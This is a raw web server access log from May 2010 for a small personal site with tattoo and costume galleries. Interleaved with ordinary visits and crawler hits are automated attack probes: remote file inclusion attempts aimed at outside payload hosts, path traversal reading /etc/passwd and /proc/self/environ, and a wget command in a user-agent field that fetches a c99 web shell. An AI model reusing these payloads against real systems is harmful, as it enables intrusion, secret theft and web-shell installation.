76.1.178.128 - - [08/May/2010:09:56:02 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:56:02 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:56:02 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:56:02 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:56:02 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:56:02 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
99.39.2.249 - - [08/May/2010:09:56:04 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
76.1.178.128 - - [08/May/2010:09:56:13 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:56:13 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:56:13 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:56:13 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
99.39.2.249 - - [08/May/2010:09:58:21 -0500] "GET /logs/access_log.1237852800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.172.150.13 - - [08/May/2010:09:58:55 -0500] "GET /logs/access_log.1228089600//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.825"
217.172.150.13 - - [08/May/2010:09:58:55 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.825"
217.172.150.13 - - [08/May/2010:09:58:56 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.825"
99.39.2.249 - - [08/May/2010:09:59:01 -0500] "GET /logs/access_log.1237852800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:10:00:23 -0500] "GET /logs/access_log.1237852800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.13.90 - - [08/May/2010:10:00:50 -0500] "GET /logs/access_log.1214092800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.42 - - [08/May/2010:10:01:22 -0500] "GET /logs/access_log.1218153600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
99.39.2.249 - - [08/May/2010:10:01:33 -0500] "GET /logs/access_log.1237852800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.204.243 - - [08/May/2010:10:02:50 -0500] "GET /logs/access_log.1226880000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/May/2010:10:04:22 -0500] "GET /logs/access_log.1237852800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [08/May/2010:10:07:58 -0500] "GET /logs/access_log.1196640000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.108.112.112 - - [08/May/2010:10:08:52 -0500] "GET /logs/access_log.1228089600//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
194.108.112.112 - - [08/May/2010:10:08:53 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
194.108.112.112 - - [08/May/2010:10:08:53 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.250.255.243 - - [08/May/2010:10:10:29 -0500] "GET /logs/access_log.1267401600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
82.96.90.170 - - [08/May/2010:10:11:41 -0500] "GET //modules/Forums/admin/errors.php?error=http://www.limawarriors.com/administrator/ID1.txt????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
82.96.90.170 - - [08/May/2010:10:11:41 -0500] "GET /logs//modules/Forums/admin/errors.php?error=http://www.limawarriors.com/administrator/ID1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.96.90.170 - - [08/May/2010:10:11:41 -0500] "GET /logs/access_log.1266278400//modules/Forums/admin/errors.php?error=http://www.limawarriors.com/administrator/ID1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
62.128.135.38 - - [08/May/2010:10:12:33 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
62.128.135.38 - - [08/May/2010:10:12:33 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
62.128.135.38 - - [08/May/2010:10:12:33 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""-"
62.128.135.38 - - [08/May/2010:10:12:33 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
210.50.189.221 - - [08/May/2010:10:13:20 -0500] "GET /logs/access_log.1228089600//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
210.50.189.221 - - [08/May/2010:10:13:20 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
210.50.189.221 - - [08/May/2010:10:13:21 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.195.112.180 - - [08/May/2010:10:14:28 -0500] "GET /logs/access_log.1197417600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.129.119.11 - - [08/May/2010:10:15:59 -0500] "GET /logs/access_log.1259539200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.127.70.140 - - [08/May/2010:10:18:19 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 379 "-""libwww-perl/5.65"
216.127.70.140 - - [08/May/2010:10:18:20 -0500] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
216.127.70.140 - - [08/May/2010:10:18:20 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.65"
216.127.70.140 - - [08/May/2010:10:21:16 -0500] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
87.250.255.243 - - [08/May/2010:10:23:12 -0500] "GET /logs/access_log.1227225600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.30.142.216 - - [08/May/2010:10:23:18 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [08/May/2010:10:23:18 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.72.200.38 - - [08/May/2010:10:24:56 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
77.72.200.38 - - [08/May/2010:10:24:59 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.7.108.203 - - [08/May/2010:10:27:44 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
65.49.28.194 - - [08/May/2010:10:29:32 -0500] "GET /logs/access_log.1228089600//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.820"
65.49.28.194 - - [08/May/2010:10:29:32 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.820"
65.49.28.194 - - [08/May/2010:10:29:32 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.820"
216.127.70.140 - - [08/May/2010:10:31:18 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 379 "-""libwww-perl/5.65"
216.127.70.140 - - [08/May/2010:10:31:37 -0500] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
216.127.70.140 - - [08/May/2010:10:31:37 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.65"
62.128.135.38 - - [08/May/2010:10:33:44 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.128.135.38 - - [08/May/2010:10:33:44 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
65.163.88.107 - - [08/May/2010:10:34:42 -0500] "GET /logs/access_log.1268956800//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.163.88.107 - - [08/May/2010:10:34:42 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
65.163.88.107 - - [08/May/2010:10:34:42 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.195.112.180 - - [08/May/2010:10:35:56 -0500] "GET /logs/access_log.1245283200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [08/May/2010:10:36:22 -0500] "GET /logs/access_log.1227744000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
62.128.135.38 - - [08/May/2010:10:36:27 -0500] "GET //?include_path=http://sior.org/zero/data/home/bovsp.txt?&mode=id HTTP/1.1" 200 1003 "-""-"
216.127.70.140 - - [08/May/2010:10:40:59 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 379 "-""libwww-perl/5.65"
216.127.70.140 - - [08/May/2010:10:41:00 -0500] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
216.127.70.140 - - [08/May/2010:10:41:01 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.65"
121.88.4.141 - - [08/May/2010:10:43:31 -0500] "GET //index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.88.4.141 - - [08/May/2010:10:43:31 -0500] "GET /logs/access_log.1265760000//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.88.4.141 - - [08/May/2010:10:43:32 -0500] "GET /logs//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.88.4.141 - - [08/May/2010:10:43:32 -0500] "GET /logs/access_log.1266019200//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.88.4.141 - - [08/May/2010:10:43:46 -0500] "GET //index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.88.4.141 - - [08/May/2010:10:43:46 -0500] "GET /logs//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.88.4.141 - - [08/May/2010:10:43:46 -0500] "GET /logs/access_log.1266019200//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.88.4.141 - - [08/May/2010:10:43:46 -0500] "GET /logs/access_log.1265760000//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.249.65.40 - - [08/May/2010:10:46:51 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [08/May/2010:10:46:54 -0500] "GET /logs/access_log.1235952000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.127.70.140 - - [08/May/2010:10:49:16 -0500] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
114.108.151.149 - - [08/May/2010:10:52:53 -0500] "GET ///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:10:52:53 -0500] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:10:52:53 -0500] "GET /logs/access_log.1272067200%20%20///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 390 "-""Mozilla/5.0"
77.72.200.38 - - [08/May/2010:10:53:43 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
77.72.200.38 - - [08/May/2010:10:53:43 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
77.72.200.38 - - [08/May/2010:10:53:43 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
77.72.200.38 - - [08/May/2010:10:53:43 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
77.72.200.38 - - [08/May/2010:10:53:43 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
77.72.200.38 - - [08/May/2010:10:53:43 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
216.129.119.43 - - [08/May/2010:10:55:23 -0500] "GET /logs/access_log.1272326400 HTTP/1.1" 200 499731 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.43 - - [08/May/2010:10:56:31 -0500] "GET /artwork/puzzles.htm HTTP/1.1" 200 1591 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.43 - - [08/May/2010:10:57:35 -0500] "GET /logs/access_log.1239753600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [08/May/2010:10:58:27 -0500] "GET /logs/access_log.1260921600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.40 - - [08/May/2010:11:01:46 -0500] "GET /logs/access_log.1253404800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.195.242 - - [08/May/2010:11:02:20 -0500] "GET /logs/access_log.1256342400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.7.108.203 - - [08/May/2010:11:03:51 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.203 - - [08/May/2010:11:03:51 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.203 - - [08/May/2010:11:03:52 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
84.40.30.37 - - [08/May/2010:11:04:32 -0500] "GET /logs/access_log.1270598400%20%20//components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
84.40.30.37 - - [08/May/2010:11:04:32 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
84.40.30.37 - - [08/May/2010:11:04:32 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
84.40.30.37 - - [08/May/2010:11:04:46 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
84.40.30.37 - - [08/May/2010:11:04:46 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
84.40.30.37 - - [08/May/2010:11:04:46 -0500] "GET /logs/access_log.1270598400%20%20//components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:11:06:47 -0500] "GET /logs//bbs//skin/rosun_comm2_gallery/setup.php?dir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:11:06:47 -0500] "GET /logs/access_log.1266192000//bbs//skin/rosun_comm2_gallery/setup.php?dir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:11:06:47 -0500] "GET //bbs//skin/rosun_comm2_gallery/setup.php?dir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:11:07:10 -0500] "GET /logs/access_log.1266710400//bbs//skin/rosun_comm2_gallery/setup.php?dir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
207.46.199.200 - - [08/May/2010:11:09:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.94.22.44 - - [08/May/2010:11:09:26 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:09:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/costume/""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:09:30 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:09:30 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:09:30 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:09:30 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
74.81.84.11 - - [08/May/2010:11:09:54 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.81.84.11 - - [08/May/2010:11:09:54 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""wget http://marketlink.uk.net/img/.log/c99 -O /tmp/shell346"
81.94.22.44 - - [08/May/2010:11:10:08 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:16 -0500] "GET /costume/thmb7.htm HTTP/1.1" 200 2938 "http://tomdolan.pconline.com/costume/costume2.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:16 -0500] "GET /costume/costume73%20copy.JPG HTTP/1.1" 200 17492 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:16 -0500] "GET /costume/costume74%20copy.JPG HTTP/1.1" 200 17534 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:16 -0500] "GET /costume/costume75%20copy.JPG HTTP/1.1" 200 17209 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:16 -0500] "GET /costume/costume76%20copy.JPG HTTP/1.1" 200 16386 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:17 -0500] "GET /costume/costume77%20copy.JPG HTTP/1.1" 200 16029 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:17 -0500] "GET /costume/costume81%20copy.JPG HTTP/1.1" 200 18119 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:17 -0500] "GET /costume/costume78%20copy.JPG HTTP/1.1" 200 15860 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:17 -0500] "GET /costume/costume79%20copy.JPG HTTP/1.1" 200 19168 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:17 -0500] "GET /costume/costume82%20copy.JPG HTTP/1.1" 200 16328 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:17 -0500] "GET /costume/costume83%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:17 -0500] "GET /costume/costume82%20copy.JPG HTTP/1.1" 200 16328 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:17 -0500] "GET /costume/costume83%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:17 -0500] "GET /costume/costume84%20copy.JPG HTTP/1.1" 200 15105 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
81.94.22.44 - - [08/May/2010:11:10:18 -0500] "GET /costume/costume80.JPG HTTP/1.1" 200 67426 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
